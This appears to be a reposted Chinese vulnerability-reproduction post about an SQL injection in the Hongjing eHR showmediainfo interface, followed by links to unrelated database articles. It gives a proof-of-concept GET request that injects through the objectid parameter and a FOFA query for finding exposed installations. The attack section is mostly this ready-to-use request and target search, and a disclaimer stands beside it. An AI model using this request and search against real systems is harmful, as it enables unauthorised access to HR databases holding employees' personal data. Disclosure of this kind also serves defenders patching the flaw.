目录

【漏洞复现】宏景eHR showmediainfo SQL注入漏洞

0x01 产品简介

北京宏景世纪软件股份有限公司(简称"宏景软件")专注于国有企事业单位人力与人才管理数智化(数字化、智能化)产品的研发和应用推广。

0x02 漏洞概述

宏景eHR /workbench/duty/showmediainfo接口存在SQL注入漏洞,攻击者可以通过该漏洞构造sql语句获取数据库信息。

0x03 测绘语句

复制代码
宏景eHR

0x04 漏洞复现

复制代码
GET /workbench/duty/showmediainfo?kind=0&usernumber=1MV8sCtnMcsZFzLhJXUMPAATTP2HJFPAATTPVIRoUrFdir1XVNthrak35kPAATTP3HJDPAATTP&planid=1&objectid=1' HTTP/1.1

0x05 影响范围

复制代码
fofa: app="HJSOFT-HCM"

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
oh,huoyuyan42 分钟前
火语言RPA--Sqlite-导入数据表格
数据库·sqlite·rpa
伏游1 小时前
【BUG】生产环境死锁问题定位排查解决全过程
服务器·数据库·spring boot·后端·postgresql·bug
搬码红绿灯2 小时前
数据库——MySQL数字函数和子查询
数据库·mysql
侧耳倾听1112 小时前
使用内存数据库来为mapper层的接口编写单元测试
数据库·单元测试
ifanatic2 小时前
[每周一更]-(第138期):MySQL 子查询详解:原理、应用及优化方案
数据库·mysql
TDengine (老段)3 小时前
TDengine 中的日志系统
java·大数据·数据库·物联网·时序数据库·tdengine·iotdb
kfepiza4 小时前
Debian编译安装mysql8.0.41源码包 笔记250401
数据库·笔记·mysql·debian·database
tjfsuxyy4 小时前
SqlServer整库迁移至Oracle
数据库·oracle·sqlserver
老王笔记4 小时前
MySQL统计信息
数据库·mysql